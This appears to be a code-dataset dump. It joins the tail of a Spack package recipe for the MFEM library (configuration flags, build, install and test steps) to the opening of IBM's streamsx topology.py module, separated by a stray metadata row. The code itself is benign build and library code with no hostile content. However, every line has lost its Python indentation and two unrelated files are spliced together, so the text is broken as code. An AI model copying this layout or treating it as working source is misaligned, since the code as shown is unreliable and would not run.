if '~shared' in strumpack:
if os.path.basename(env['FC']) == 'gfortran':
gfortran = Executable(env['FC'])
libext = 'dylib' if sys.platform == 'darwin' else 'so'
libfile = os.path.abspath(gfortran(
'-print-file-name=libgfortran.%s' % libext,
output=str).strip())
gfortran_lib = LibraryList(libfile)
sp_lib += [ld_flags_from_library_list(gfortran_lib)]
if ('^mpich' in strumpack) or ('^mvapich2' in strumpack):
sp_lib += ['-lmpifort']
elif '^openmpi' in strumpack:
sp_lib += ['-lmpi_mpifh']
elif '^spectrum-mpi' in strumpack:
sp_lib += ['-lmpi_ibm_mpifh']
if '+openmp' in strumpack:
# The '+openmp' in the spec means strumpack will TRY to find
# OpenMP; if not found, we should not add any flags -- how do
# we figure out if strumpack found OpenMP?
if not self.spec.satisfies('%apple-clang'):
sp_opt += [xcompiler + self.compiler.openmp_flag]
if '^parmetis' in strumpack:
parmetis = strumpack['parmetis']
sp_opt += [parmetis.headers.cpp_flags]
sp_lib += [ld_flags_from_library_list(parmetis.libs)]
if '^netlib-scalapack' in strumpack:
scalapack = strumpack['scalapack']
sp_opt += ['-I%s' % scalapack.prefix.include]
sp_lib += [ld_flags_from_dirs([scalapack.prefix.lib],
['scalapack'])]
elif '^scalapack' in strumpack:
scalapack = strumpack['scalapack']
sp_opt += [scalapack.headers.cpp_flags]
sp_lib += [ld_flags_from_library_list(scalapack.libs)]
if '+butterflypack' in strumpack:
bp = strumpack['butterflypack']
sp_opt += ['-I%s' % bp.prefix.include]
sp_lib += [ld_flags_from_dirs([bp.prefix.lib],
['dbutterflypack',
'zbutterflypack'])]
if '+zfp' in strumpack:
zfp = strumpack['zfp']
sp_opt += ['-I%s' % zfp.prefix.include]
sp_lib += [ld_flags_from_dirs([zfp.prefix.lib], ['zfp'])]
if '+cuda' in strumpack:
# assuming also ('+cuda' in spec)
sp_lib += ['-lcusolver', '-lcublas']
options += [
'STRUMPACK_OPT=%s' % ' '.join(sp_opt),
'STRUMPACK_LIB=%s' % ' '.join(sp_lib)]
if '+suite-sparse' in spec:
ss_spec = 'suite-sparse:' + self.suitesparse_components
options += [
'SUITESPARSE_OPT=-I%s' % spec[ss_spec].prefix.include,
'SUITESPARSE_LIB=%s' %
ld_flags_from_library_list(spec[ss_spec].libs)]
if '+sundials' in spec:
sun_spec = 'sundials:' + self.sundials_components
options += [
'SUNDIALS_OPT=%s' % spec[sun_spec].headers.cpp_flags,
'SUNDIALS_LIB=%s' %
ld_flags_from_library_list(spec[sun_spec].libs)]
if '+petsc' in spec:
petsc = spec['petsc']
if '+shared' in petsc:
options += [
'PETSC_OPT=%s' % petsc.headers.cpp_flags,
'PETSC_LIB=%s' % ld_flags_from_library_list(petsc.libs)]
else:
options += ['PETSC_DIR=%s' % petsc.prefix]
if '+slepc' in spec:
slepc = spec['slepc']
options += [
'SLEPC_OPT=%s' % slepc.headers.cpp_flags,
'SLEPC_LIB=%s' % ld_flags_from_library_list(slepc.libs)]
if '+pumi' in spec:
pumi_libs = ['pumi', 'crv', 'ma', 'mds', 'apf', 'pcu', 'gmi',
'parma', 'lion', 'mth', 'apf_zoltan', 'spr']
options += [
'PUMI_OPT=-I%s' % spec['pumi'].prefix.include,
'PUMI_LIB=%s' %
ld_flags_from_dirs([spec['pumi'].prefix.lib], pumi_libs)]
if '+gslib' in spec:
options += [
'GSLIB_OPT=-I%s' % spec['gslib'].prefix.include,
'GSLIB_LIB=%s' %
ld_flags_from_dirs([spec['gslib'].prefix.lib], ['gs'])]
if '+netcdf' in spec:
lib_flags = ld_flags_from_dirs([spec['netcdf-c'].prefix.lib],
['netcdf'])
hdf5 = spec['hdf5:hl']
if hdf5.satisfies('~shared'):
hdf5_libs = hdf5.libs
hdf5_libs += LibraryList(find_system_libraries('libdl'))
lib_flags += " " + ld_flags_from_library_list(hdf5_libs)
options += [
'NETCDF_OPT=-I%s' % spec['netcdf-c'].prefix.include,
'NETCDF_LIB=%s' % lib_flags]
if '+zlib' in spec:
if "@:3.3.2" in spec:
options += ['ZLIB_DIR=%s' % spec['zlib'].prefix]
else:
options += [
'ZLIB_OPT=-I%s' % spec['zlib'].prefix.include,
'ZLIB_LIB=%s' %
ld_flags_from_library_list(spec['zlib'].libs)]
if '+mpfr' in spec:
options += [
'MPFR_OPT=-I%s' % spec['mpfr'].prefix.include,
'MPFR_LIB=%s' %
ld_flags_from_dirs([spec['mpfr'].prefix.lib], ['mpfr'])]
if '+gnutls' in spec:
options += [
'GNUTLS_OPT=-I%s' % spec['gnutls'].prefix.include,
'GNUTLS_LIB=%s' %
ld_flags_from_dirs([spec['gnutls'].prefix.lib], ['gnutls'])]
if '+libunwind' in spec:
libunwind = spec['unwind']
headers = find_headers('libunwind', libunwind.prefix.include)
headers.add_macro('-g')
libs = find_optional_library('libunwind', libunwind.prefix)
# When mfem uses libunwind, it also needs 'libdl'.
libs += LibraryList(find_system_libraries('libdl'))
options += [
'LIBUNWIND_OPT=%s' % headers.cpp_flags,
'LIBUNWIND_LIB=%s' % ld_flags_from_library_list(libs)]
if '+openmp' in spec:
options += [
'OPENMP_OPT=%s' % (xcompiler + self.compiler.openmp_flag)]
if '+cuda' in spec:
options += [
'CUDA_CXX=%s' % join_path(spec['cuda'].prefix, 'bin', 'nvcc'),
'CUDA_ARCH=sm_%s' % cuda_arch]
if '+rocm' in spec:
amdgpu_target = ','.join(spec.variants['amdgpu_target'].value)
options += [
'HIP_CXX=%s' % spec['hip'].hipcc,
'HIP_ARCH=%s' % amdgpu_target]
if '+occa' in spec:
options += ['OCCA_OPT=-I%s' % spec['occa'].prefix.include,
'OCCA_LIB=%s' %
ld_flags_from_dirs([spec['occa'].prefix.lib],
['occa'])]
if '+raja' in spec:
options += ['RAJA_OPT=-I%s' % spec['raja'].prefix.include,
'RAJA_LIB=%s' %
ld_flags_from_dirs([spec['raja'].prefix.lib],
['RAJA'])]
if '+amgx' in spec:
amgx = spec['amgx']
if '+shared' in amgx:
options += ['AMGX_OPT=-I%s' % amgx.prefix.include,
'AMGX_LIB=%s' %
ld_flags_from_library_list(amgx.libs)]
else:
options += ['AMGX_DIR=%s' % amgx.prefix]
if '+libceed' in spec:
options += ['CEED_OPT=-I%s' % spec['libceed'].prefix.include,
'CEED_LIB=%s' %
ld_flags_from_dirs([spec['libceed'].prefix.lib],
['ceed'])]
if '+umpire' in spec:
options += ['UMPIRE_OPT=-I%s' % spec['umpire'].prefix.include,
'UMPIRE_LIB=%s' %
ld_flags_from_library_list(spec['umpire'].libs)]
timer_ids = {'std': '0', 'posix': '2', 'mac': '4', 'mpi': '6'}
timer = spec.variants['timer'].value
if timer != 'auto':
options += ['MFEM_TIMER_TYPE=%s' % timer_ids[timer]]
if '+conduit' in spec:
conduit = spec['conduit']
headers = HeaderList(find(conduit.prefix.include, 'conduit.hpp',
recursive=True))
conduit_libs = ['libconduit', 'libconduit_relay',
'libconduit_blueprint']
libs = find_libraries(conduit_libs, conduit.prefix.lib,
shared=('+shared' in conduit))
libs += LibraryList(find_system_libraries('libdl'))
if '+hdf5' in conduit:
hdf5 = conduit['hdf5']
headers += find_headers('hdf5', hdf5.prefix.include)
libs += hdf5.libs
##################
# cyrush note:
##################
# spack's HeaderList is applying too much magic, undermining us:
#
# It applies a regex to strip back to the last "include" dir
# in the path. In our case we need to pass the following
# as part of the CONDUIT_OPT flags:
#
# -I<install_path>/include/conduit
#
# I tried several ways to present this path to the HeaderList,
# but the regex always kills the trailing conduit dir
# breaking build.
#
# To resolve the issue, we simply join our own string with
# the headers results (which are important b/c they handle
# hdf5 paths when enabled).
##################
# construct proper include path
conduit_include_path = conduit.prefix.include.conduit
# add this path to the found flags
conduit_opt_flags = "-I{0} {1}".format(conduit_include_path,
headers.cpp_flags)
options += [
'CONDUIT_OPT=%s' % conduit_opt_flags,
'CONDUIT_LIB=%s' % ld_flags_from_library_list(libs)]
make('config', *options, parallel=False)
make('info', parallel=False)
def build(self, spec, prefix):
make('lib')
@run_after('build')
def check_or_test(self):
# Running 'make check' or 'make test' may fail if MFEM_MPIEXEC or
# MFEM_MPIEXEC_NP are not set appropriately.
if not self.run_tests:
# check we can build ex1 (~mpi) or ex1p (+mpi).
make('-C', 'examples', 'ex1p' if ('+mpi' in self.spec) else 'ex1',
parallel=False)
# make('check', parallel=False)
else:
make('all')
make('test', parallel=False)
def install(self, spec, prefix):
make('install', parallel=False)
# TODO: The way the examples and miniapps are being installed is not
# perfect. For example, the makefiles do not work.
install_em = ('+examples' in spec) or ('+miniapps' in spec)
if install_em and ('+shared' in spec):
make('examples/clean', 'miniapps/clean')
# This is a hack to get the examples and miniapps to link with the
# installed shared mfem library:
with working_dir('config'):
os.rename('config.mk', 'config.mk.orig')
copy(str(self.config_mk), 'config.mk')
shutil.copystat('config.mk.orig', 'config.mk')
prefix_share = join_path(prefix, 'share', 'mfem')
if '+examples' in spec:
make('examples')
install_tree('examples', join_path(prefix_share, 'examples'))
if '+miniapps' in spec:
make('miniapps')
install_tree('miniapps', join_path(prefix_share, 'miniapps'))
if install_em:
install_tree('data', join_path(prefix_share, 'data'))
examples_src_dir = 'examples'
examples_data_dir = 'data'
@run_after('install')
def cache_test_sources(self):
"""Copy the example source files after the package is installed to an
install test subdirectory for use during `spack test run`."""
self.cache_extra_test_sources([self.examples_src_dir,
self.examples_data_dir])
def test(self):
test_dir = join_path(
self.test_suite.current_test_cache_dir,
self.examples_src_dir
)
# MFEM has many examples to serve as a suitable smoke check. ex10
# was chosen arbitrarily among the examples that work both with
# MPI and without it
test_exe = 'ex10p' if ('+mpi' in self.spec) else 'ex10'
self.run_test(
'make',
[
'CONFIG_MK={0}/share/mfem/config.mk'.format(self.prefix),
test_exe,
'parallel=False'
],
purpose='test: building {0}'.format(test_exe),
skip_missing=False,
work_dir=test_dir,
)
self.run_test(
'./{0}'.format(test_exe),
[
'--mesh',
'../{0}/beam-quad.mesh'.format(self.examples_data_dir)
],
[],
installed=False,
purpose='test: running {0}'.format(test_exe),
skip_missing=False,
work_dir=test_dir,
)
# this patch is only needed for mfem 4.1, where a few
# released files include byte order marks
@when('@4.1.0')
def patch(self):
# Remove the byte order mark since it messes with some compilers
files_with_bom = [
'fem/gslib.hpp', 'fem/gslib.cpp', 'linalg/hiop.hpp',
'miniapps/gslib/field-diff.cpp', 'miniapps/gslib/findpts.cpp',
'miniapps/gslib/pfindpts.cpp']
bom = '\xef\xbb\xbf' if sys.version_info < (3,) else u'\ufeff'
for f in files_with_bom:
filter_file(bom, '', f)
@property
def suitesparse_components(self):
"""Return the SuiteSparse components needed by MFEM."""
ss_comps = 'umfpack,cholmod,colamd,amd,camd,ccolamd,suitesparseconfig'
if self.spec.satisfies('@3.2:'):
ss_comps = 'klu,btf,' + ss_comps
return ss_comps
@property
def sundials_components(self):
"""Return the SUNDIALS components needed by MFEM."""
spec = self.spec
sun_comps = 'arkode,cvodes,nvecserial,kinsol'
if '+mpi' in spec:
if spec.satisfies('@4.2:'):
sun_comps += ',nvecparallel,nvecmpiplusx'
else:
sun_comps += ',nvecparhyp,nvecparallel'
if '+cuda' in spec and '+cuda' in spec['sundials']:
sun_comps += ',nveccuda'
return sun_comps
@property
def headers(self):
"""Export the main mfem header, mfem.hpp.
"""
hdrs = HeaderList(find(self.prefix.include, 'mfem.hpp',
recursive=False))
return hdrs or None
@property
def libs(self):
"""Export the mfem library file.
"""
libs = find_libraries('libmfem', root=self.prefix.lib,
shared=('+shared' in self.spec), recursive=False)
return libs or None
@property
def config_mk(self):
"""Export the location of the config.mk file.
This property can be accessed using spec['mfem'].package.config_mk
"""
dirs = [self.prefix, self.prefix.share.mfem]
for d in dirs:
f = join_path(d, 'config.mk')
if os.access(f, os.R_OK):
return FileList(f)
return FileList(find(self.prefix, 'config.mk', recursive=True))
@property
def test_mk(self):
"""Export the location of the test.mk file.
This property can be accessed using spec['mfem'].package.test_mk.
In version 3.3.2 and newer, the location of test.mk is also defined
inside config.mk, variable MFEM_TEST_MK.
"""
dirs = [self.prefix, self.prefix.share.mfem]
for d in dirs:
f = join_path(d, 'test.mk')
if os.access(f, os.R_OK):
return FileList(f)
return FileList(find(self.prefix, 'test.mk', recursive=True))
| []
| []
| []
| [] | [] | python | 0 | 0 | |
com.ibm.streamsx.topology/opt/python/packages/streamsx/topology/topology.py | # coding=utf-8
# Licensed Materials - Property of IBM
# Copyright IBM Corp. 2015,2019
"""
Streaming application definition.
********
Overview
********
IBM Streams is an advanced analytic platform that allows user-developed
applications to quickly ingest, analyze and correlate information as it
arrives from thousands of real-time sources.
Streams can handle very high data throughput rates, millions of events
or messages per second.
With this API Python developers can build streaming applications
that can be executed using IBM Streams, including the processing
being distributed across multiple computing resources
(hosts or machines) for scalability.
********
Topology
********
A :py:class:`Topology` declares a graph of *streams* and *operations* against
tuples (data items) on those streams.
After being declared, a Topology is submitted to be compiled into
a Streams application bundle (sab file) and then executed.
The sab file is a self contained bundle that can be executed
in a distributed Streams instance either using the Streaming
Analytics service on IBM Cloud or an on-premise
IBM Streams installation.
The compilation step invokes the Streams compiler to produce a bundle.
This effectively, from a Python point of view, produces a runnable
version of the Python topology that includes application
specific Python C extensions to optimize performance.
The bundle also includes any required Python packages or modules
that were used in the declaration of the application, excluding
ones that are in a directory path containing ``site-packages``.
The Python standard package tool ``pip`` uses a directory structure
including ``site-packages`` when installing packages. Packages installed
with ``pip`` can be included in the bundle with
:py:meth:`~Topology.add_pip_package` when using a build service.
This avoids the requirement to have packages be preinstalled in cloud environments.
Local Python packages and modules containing callables used in transformations
such as :py:meth:`~Stream.map` are copied into the bundle from their
local location. The addition of local packages to the bundle can be controlled
with :py:attr:`Topology.include_packages` and
:py:attr:`Topology.exclude_packages`.
The Streams runtime distributes the application's operations
across the resources available in the instance.
.. note::
`Topology` represents a declaration of a streaming application that
will be executed by a Streams instance as a `job`, either using the Streaming Analytics
service on IBM Cloud or an on-premises distributed instance.
`Topology` does not represent a running application, so an instance of `Stream` class does not contain
the tuples, it is only a declaration of a stream.
.. _stream-desc:
******
Stream
******
A :py:class:`Stream` can be an infinite sequence of tuples, such as a stream for a traffic flow sensor.
Alternatively, a stream can be finite, such as a stream that is created from the contents of a file.
When a streams processing application contains infinite streams, the application runs continuously without ending.
A stream has a schema that defines the type of each tuple on the stream.
The schema for a stream is either:
* :py:const:`~streamsx.topology.schema.CommonSchema.Python` - A tuple may be any Python object. This is the default when the schema is not explictly or implicitly set.
* :py:const:`~streamsx.topology.schema.CommonSchema.String` - Each tuple is a Unicode string.
* :py:const:`~streamsx.topology.schema.CommonSchema.Binary` - Each tuple is a blob.
* :py:const:`~streamsx.topology.schema.CommonSchema.Json` - Each tuple is a Python dict that can be expressed as a JSON object.
* Structured - A stream that has a structured schema of a ordered list of attributes, with each attribute having a fixed type (e.g. float64 or int32) and a name. The schema of a structured stream is defined using typed named tuple or :py:const:`~streamsx.topology.schema.StreamSchema`.
A stream's schema is implictly dervied from type hints declared for the callable
of the transform that produces it. For example `readings` defined as follows would have a structured schema matching ``SensorReading`` ::
class SensorReading(typing.NamedTuple):
sensor_id: str
ts: int
reading: float
def reading_from_json(value:dict) -> SensorReading:
return SensorReading(value['id'], value['timestamp'], value['reading'])
topo = Topology()
json_readings = topo.source(HttpReadings()).as_json()
readings = json_readings.map(reading_from_json)
Deriving schemas from type hints can be disabled by setting the topology's
``type_checking`` attribute to false, for example this would change `readings`
in the previous example to have generic Python object schema :py:const:`~streamsx.topology.schema.CommonSchema.Python` ::
topo = Topology()
topo.type_checking = False
*****************
Stream processing
*****************
Callables
=========
A stream is processed to produce zero or more transformed streams,
such as filtering a stream to drop unwanted tuples, producing a stream
that only contains the required tuples.
Streaming processing is per tuple based, as each tuple is submitted to a stream consuming operators
have their processing logic invoked for that tuple.
A functional operator is declared by methods on :py:class:`Stream` such as :py:meth:`~Stream.map` which
maps the tuples on its input stream to tuples on its output stream. `Stream` uses a functional model
where each stream processing operator is defined in terms a Python callable that is invoked passing
input tuples and whose return defines what output tuples are submitted for downstream processing.
The Python callable used for functional processing in this API may be:
* A Python lambda function.
* A Python function.
* An instance of a Python callable class.
For example a stream ``words`` containing only string objects can be
processed by a :py:meth:`~Stream.filter` using a lambda function::
# Filter the stream so it only contains words starting with py
pywords = words.filter(lambda word : word.startswith('py'))
When a callable has type hints they are used to:
* define the schema of the resulting transformation, see :ref:`stream-desc`.
* type checking the correctness of the transformation at topology declaration time.
For example if the callable defining the source had type hints that indicated
it was an iterator of ``str`` objects then the schema of the resultant stream
would be :py:const:`~streamsx.topology.schema.CommonSchema.String`. If this
source stream then underwent a :py:meth:`Stream.map` transform with a callable
that had a type hint for its argument, a check is made to ensure
that the type of the argument is compatible with ``str``.
Type hints are maintained through transforms regardless of resultant schema.
For example a transform that has a return type hint of ``int`` defines
the schema as :py:const:`~streamsx.topology.schema.CommonSchema.Python`,
but the type hint is retained even though the schema is generic. Thus an
error is raised at topology declaration time if a downstream transformation
uses a callable with a type hint that is incompatible with being passed an ``int``.
How type hints are used is specific to each transformation, such as
:py:meth:`~Topology.source`, :py:meth:`~Stream.map`, :py:meth:`~Stream.filter` etc.
Type checking can be disabled by setting the topology's ``type_checking`` attribute to false.
When a callable is a lambda or defined inline (defined in the main Python script,
a notebook or an interactive session) then a serialized copy of its definition becomes part of the
topology. The supported types of captured globals for these callables is limited to
avoid increasing the size of the application and serialization failures due non-serializable
objects directly or indirectly referenced from captured globals. The supported types of captured globals
are constants (``int``, ``str``, ``float``, ``bool``, ``bytes``, ``complex``), modules, module attributes (e.g. classes, functions and variables
defined in a module), inline classes and functions. If a lambda or inline callable causes an exception due to unsupported global
capture then moving it to its own module is a solution.
Due to `Python bug 36697 <https://bugs.python.org/issue36697>`_ a lambda or inline callable can
incorrect capture a global variable. For example an inline class using a attribute of ``self.model``
will incorrectly capture the global ``model`` even if the global variable ``model`` is never used within the class.
To workaround this bug use attribute or variable names that do not shadow global variables
(e.g. ``self._model``).
Due to `issue 2336 <https://github.com/IBMStreams/streamsx.topology/issues/2336>`_ an inline class using ``super()`` will cause an ``AttributeError`` at runtime. Workaround is to call the super class's method directly, for example replace this code::
class A(X):
def __init__(self):
super().__init__()
with::
class A(X):
def __init__(self):
X.__init__(self)
or move the class to a module.
Stateful operations
===================
Use of a class instance allows the operation to be stateful by maintaining state in instance
attributes across invocations.
.. note::
For support with consistent region or checkpointing instances should ensure that the object's state can be pickled. See https://docs.python.org/3.5/library/pickle.html#handling-stateful-objects
Initialization and shutdown
===========================
Execution of a class instance effectively run in a context manager so that an instance's ``__enter__``
method is called when the processing element containing the instance is initialized
and its ``__exit__`` method called when the processing element is stopped. To take advantage of this
the class must define both ``__enter__`` and ``__exit__`` methods.
.. note::
Since an instance of a class is passed to methods such as
:py:meth:`~Stream.map` ``__init__`` is only called when the topology is `declared`, not at runtime.
Initialization at runtime, such as opening connections, occurs through the ``__enter__`` method.
Example of using ``__enter__`` to create custom metrics::
import streamsx.ec as ec
class Sentiment(object):
def __init__(self):
pass
def __enter__(self):
self.positive_metric = ec.CustomMetric(self, "positiveSentiment")
self.negative_metric = ec.CustomMetric(self, "negativeSentiment")
def __exit__(self, exc_type, exc_value, traceback):
pass
def __call__(self):
pass
When an instance defines a valid ``__exit__`` method then it will be called with an exception when:
* the instance raises an exception during processing of a tuple
* a data conversion exception is raised converting a value to an structutured schema tuple or attribute
If ``__exit__`` returns a true value then the exception is suppressed and processing continues, otherwise the enclosing processing element will be terminated.
Tuple semantics
===============
Python objects on a stream may be passed by reference between callables (e.g. the value returned by a map callable may be passed by reference to a following filter callable). This can only occur when the functions are executing in the same PE (process). If an object is not passed by reference a deep-copy is passed. Streams that cross PE (process) boundaries are always passed by deep-copy.
Thus if a stream is consumed by two map and one filter callables in the same PE they may receive the same object reference that was sent by the upstream callable. If one (or more) callable modifies the passed in reference those changes may be seen by the upstream callable or the other callables. The order of execution of the downstream callables is not defined. One can prevent such potential non-deterministic behavior by one or more of these techniques:
* Passing immutable objects
* Not retaining a reference to an object that will be submitted on a stream
* Not modifying input tuples in a callable
* Using copy/deepcopy when returning a value that will be submitted to a stream.
Applications cannot rely on pass-by reference, it is a performance optimization that can be made in some situations when stream connections are within a PE.
Application log and trace
=========================
IBM Streams provides application trace and log services which are
accesible through standard Python loggers from the `logging` module.
See :ref:`streams_app_log_trc`.
SPL operators
=============
In addition an application declared by `Topology` can include stream processing defined by SPL primitive or
composite operators. This allows reuse of adapters and analytics provided by IBM Streams,
open source and third-party SPL toolkits.
See :py:mod:`streamsx.spl.op`
***************
Module contents
***************
"""
__all__ = [ 'Routing', 'SubscribeConnection', 'Topology', 'Stream', 'View', 'PendingStream', 'Window', 'Sink' ]
import streamsx._streams._version
__version__ = streamsx._streams._version.__version__
import copy
import collections
import random
import streamsx._streams._placement as _placement
import streamsx._streams._hints
import streamsx.spl.op
import streamsx.spl.types
import streamsx.spl.spl
import streamsx.topology.graph
import streamsx.topology.schema
import streamsx.topology.functions
import streamsx.topology.runtime
import dill
import types
import base64
import json
import threading
import queue
import sys
import os
import time
import inspect
import logging
import datetime
import pkg_resources
import warnings
from enum import Enum
logger = logging.getLogger('streamsx.topology')
def _source_info():
"""
Get information from the user's code (two frames up)
to leave breadcrumbs for file, line, class and function.
"""
ofi = inspect.getouterframes(inspect.currentframe())[2]
try:
calling_class = ofi[0].f_locals['self'].__class__
except KeyError:
calling_class = None
# Tuple of file,line,calling_class,function_name
return ofi[1], ofi[2], calling_class, ofi[3]
class _SourceLocation(object):
"""
Saved source info to eventually create an SPL
annotation with the info in JSON form.
This object's JSON is put into the JSON as "sourcelocation"
"""
def __init__(self, source_info, method=None):
self.source_info = source_info
self.method = method
def spl_json(self):
sl = {}
sl['file'] = self.source_info[0]
sl['line'] = self.source_info[1]
if self.source_info[2] is not None:
sl['class'] = self.source_info[2].__name__
sl['method'] = self.source_info[3]
if self.method:
sl['api.method'] = self.method
return sl
"""
Determine whether a callable has state that needs to be saved during
checkpointing.
"""
def _determine_statefulness(_callable):
stateful = not inspect.isroutine(_callable)
return stateful
class Routing(Enum):
"""
Defines how tuples are routed to channels in a
parallel region.
A parallel region is started by :py:meth:`~Stream.parallel`
and ended with :py:meth:`~Stream.end_parallel` or :py:meth:`~Stream.for_each`.
"""
BROADCAST=0
"""
Tuples are routed to every channel in the parallel region.
"""
ROUND_ROBIN=1
"""
Tuples are routed to maintain an even distribution of tuples to the channels.
Each tuple is only sent to a single channel.
"""
KEY_PARTITIONED=2
HASH_PARTITIONED=3
"""
Tuples are routed based upon a hash value so that tuples with the same hash
and thus same value are always routed to the same channel. When a hash function is
specified it is passed the tuple and the return value is the hash. When no hash
function is specified then `hash(tuple)` is used.
Each tuple is only sent to a single channel.
.. warning:: A consistent hash function is required to guarantee that a tuple
with the same value is always routed to the same channel. `hash()` is not
consistent in that for types str, bytes and datetime objects are “salted”
with an unpredictable random value (Python 3.5). Thus if the processing element is
restarted channel routing for a hash based upon a str, bytes or datetime will change.
In addition code executing in the channels can see a different
hash value to other channels and the execution that routed the tuple due to
being in different processing elements.
"""
class SubscribeConnection(Enum):
"""Connection mode between a subscriber and matching publishers.
.. versionadded:: 1.9
.. seealso:: :py:meth:`~Topology.subscribe`
"""
Direct = 0
"""Direct connection between a subscriber and and matching publishers.
When connected directly a slow subscriber will cause back-pressure
against the publishers, forcing them to slow tuple processing to
the slowest publisher.
"""
Buffered = 1
"""Buffered connection between a subscriber and and matching publishers.
With a buffered connection tuples from publishers are placed in
a single queue owned by the subscriber. This allows a slower
subscriber to handle brief spikes in tuples from publishers.
A subscriber can fully isolate itself from matching publishers
by adding a :py:class:`CongestionPolicy` that drops tuples
when the queue is full. In this case when the subscriber is
not able to keep up with the tuple rate from all matching subscribers
it will have a minimal effect on matching publishers.
"""
def spl_json(self):
return streamsx.spl.op.Expression.expression('com.ibm.streamsx.topology.topic::' + self.name).spl_json()
class Topology(object):
"""The Topology class is used to define data sources, and is passed as a parameter when submitting an application. Topology keeps track of all sources, sinks, and transformations within your application.
Submission of a Topology results in a Streams application that has
the name `namespace::name`.
Args:
name(str): Name of the topology. Defaults to a name dervied from the calling evironment if it can be determined, otherwise a random name.
namespace(str): Namespace of the topology. Defaults to a name dervied from the calling evironment if it can be determined, otherwise a random name.
Attributes:
include_packages(set[str]): Python package names to be included in the built application. Any package in this list is copied into the bundle and made available at runtime to the Python callables used in the application. By default a ``Topology`` will automatically discover which packages and modules are required to be copied, this field may be used to add additional packages that were not automatically discovered. See also :py:meth:`~Topology.add_pip_package`. Package names in `include_packages` take precedence over package names in `exclude_packages`.
exclude_packages(set[str]): Python top-level package names to be excluded from the built application. Excluding a top-level packages excludes all sub-modules at any level in the package, e.g. `sound` excludes `sound.effects.echo`. Only the top-level package can be defined, e.g. `sound` rather than `sound.filters`. Behavior when adding a module within a package is undefined. When compiling the application using Anaconda this set is pre-loaded with Python packages from the Anaconda pre-loaded set.
type_checking(bool): Set to false to disable type checking, defaults to ``True``.
name_to_runtime_id: Optional callable that returns a runtime identifier for a name. Used to override the default mapping of a name into a runtime identifer. It will be called with `name` and returns a valid SPL identifier or ``None``. If ``None`` is returned then the default mapping for `name` is used. Defaults to ``None`` indicating the default mapping is used. See :py:meth:`Stream.runtime_id <Stream.runtime_id>`.
All declared streams in a `Topology` are available through their name
using ``topology[name]``. The stream's name is defined by :py:meth:`Stream.name` and will differ from the name parameter passed when creating the stream if the application uses duplicate names.
.. versionchanged:: 1.11 Declared streams available through ``topology[name]``.
"""
def __init__(self, name=None, namespace=None, files=None):
if name is None or namespace is None:
# Take the name of the calling function
# If it starts with __ and is in a class then use the class name
# Take the namespace from the class's module if executing from
# a class otherwise use the name
si = _source_info()
if name is None:
name = si[3]
if name.startswith('__'):
if si[2] is not None:
name = si[2].__name__
if namespace is None:
if si[2] is not None:
namespace = si[2].__module__
elif si[0] is not None:
namespace = os.path.splitext(os.path.basename(si[0]))[0]
if namespace.startswith('<ipython-input'):
import streamsx.topology.graph
namespace = streamsx.topology.graph._get_project_name()
if not namespace:
namespace = 'notebook'
if sys.version_info.major == 3:
self.opnamespace = "com.ibm.streamsx.topology.functional.python"
else:
raise ValueError("Python version not supported.")
self._streams = dict()
self.include_packages = set()
self.exclude_packages = set()
self._pip_packages = list()
self._files = dict()
if "Anaconda" in sys.version or 'PROJECT_ID' in os.environ or 'DSX_PROJECT_ID' in os.environ:
import streamsx.topology.condapkgs
self.exclude_packages.update(streamsx.topology.condapkgs._CONDA_PACKAGES)
import streamsx.topology._deppkgs
if 'PROJECT_ID' in os.environ or 'DSX_PROJECT_ID' in os.environ:
self.exclude_packages.update(streamsx.topology._deppkgs._ICP4D_NB_PACKAGES)
self.exclude_packages.update(streamsx.topology._deppkgs._DEP_PACKAGES)
self.graph = streamsx.topology.graph.SPLGraph(self, name, namespace)
self._submission_parameters = dict()
self._checkpoint_period = None
self._consistent_region_config = None
self._has_jcp = False
self.type_checking = True
self.name_to_runtime_id = None
@property
def name(self):
"""
Name of the topology.
Returns:
str: Name of the topology.
"""
return self.graph.name
@property
def namespace(self):
"""
Namespace of the topology.
Returns:
str:Namespace of the topology.
"""
return self.graph.namespace
def __getitem__(self, name):
return self._streams[name]
@property
def streams(self):
"""
Dict of all streams in the topology.
Key is the name of the stream, value is the corresponding :py:obj:`Stream` instance.
The returned value is a shallow copy of current streams
in this topology. This allows callers to iterate over the copy
and perform operators that would add streams.
.. note:: Includes all streams created by composites and any internal streams created by topology.
.. versionadded:: 1.14
"""
return self._streams.copy()
def source(self, func, name=None):
"""
Declare a source stream that introduces tuples into the application.
Typically used to create a stream of tuple from an external source,
such as a sensor or reading from an external system.
Tuples are obtained from an iterator obtained from the passed iterable
or callable that returns an iterable.
Each tuple that is not None from the iterator is present on the returned stream.
Each tuple is a Python object and must be picklable to allow execution of the application
to be distributed across available resources in the Streams instance.
If the iterator's ``__iter__`` or ``__next__`` block then shutdown,
checkpointing or consistent region processing may be delayed.
Having ``__next__`` return ``None`` (no available tuples) or tuples
to submit will allow such processing to proceed.
A shutdown ``threading.Event`` is available through
:py:func:`streamsx.ec.shutdown` which becomes set when a shutdown
of the processing element has been requested. This event my be waited
on to perform a sleep that will terminate upon shutdown.
Args:
func(callable): An iterable or a zero-argument callable that returns an iterable of tuples.
name(str): Name of the stream, defaults to a generated name.
Exceptions raised by ``func`` or its iterator will cause
its processing element will terminate.
If ``func`` is a callable object then it may suppress exceptions
by return a true value from its ``__exit__`` method.
Suppressing an exception raised by ``func.__iter__`` causes the
source to be empty, no tuples are submitted to the stream.
Suppressing an exception raised by ``__next__`` on the iterator
results in no tuples being submitted for that call to ``__next__``.
Processing continues with calls to ``__next__`` to fetch subsequent tuples.
Returns:
Stream: A stream whose tuples are the result of the iterable obtained from `func`.
.. rubric:: Type hints
Type hints on `func` define the schema of the returned stream,
defaulting to :py:const:`~streamsx.topology.schema.CommonSchema.Python`
if no type hints are present.
For example ``s_sensor`` has a type hint that
defines it as an iterable of ``SensorReading`` instances (typed named tuples).
Thus `readings` has a structured schema matching ``SensorReading`` ::
def s_sensor() -> typing.Iterable[SensorReading] :
...
topo = Topology()
readings = topo.source(s_sensor)
.. rubric:: Simple examples
Finite constant source stream containing two tuples
``Hello`` and ``World``::
topo = Topology()
hw = topo.source(['Hello', 'World'])
Use of builtin `range` to produce a finite source stream
containing 100 `int` tuples from 0 to 99::
topo = Topology()
hw = topo.source(range(100))
Use of `itertools.count` to produce an infinite stream of `int` tuples::
import itertools
topo = Topology()
hw = topo.source(lambda : itertools.count())
Use of `itertools` to produce an infinite stream of tuples
with a constant value and a sequence number::
import itertools
topo = Topology()
hw = topo.source(lambda : zip(itertools.repeat(), itertools.count()))
.. rubric:: External system examples
Typically sources pull data in from external systems, such as files,
